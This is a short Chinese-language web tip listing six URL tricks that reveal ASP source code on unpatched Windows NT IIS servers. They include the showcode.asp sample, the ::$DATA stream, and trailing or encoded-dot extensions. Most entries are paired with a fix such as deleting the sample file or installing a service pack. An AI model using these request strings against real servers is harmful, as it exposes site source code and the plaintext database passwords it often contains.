| 
				 
					  
				
					
						
							| 
								  | 
						 
						
							
								偷看ASP原码的6种方法 
								 
								在没有打Services Pack6补丁的NT server上,至少有6种方法可以看到ASP程序的 
								源代码,它们是:  
								 
								1、http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?sourc 
								e=/msadc/Samples/SELECTOR/showcode.asp  
								解决方案:删除showcode.asp  
								 
								2、http://somewhere/something.asp::$DATA  
								解决方案: 装sp3  
								 
								3、http://somewhere/something.asp%2e  
								解决方案: 装sp4  
								 
								or http://somewhere/something.asp.(加一个点)  
								解决方案: 装sp4  
								 
								4、http://somewhere/something%2e%41sp  
								或者 http://somewhere/something%2e%asp  
								解决方案: 装sp4  
								 
								5、http://somewhere/something.asp%81  
								解决方案:装sp6或者打补丁  
								 
								6、http://somewhere/iissamples/exair/howitworks/code.asp?source=xxx.as 
								p  
								 
								最大的危害莫过于asp文件可以被上述方式读出;数据库密码以明文形式暴露在黑 
								客眼前;    | 
						 
					
				 
			 |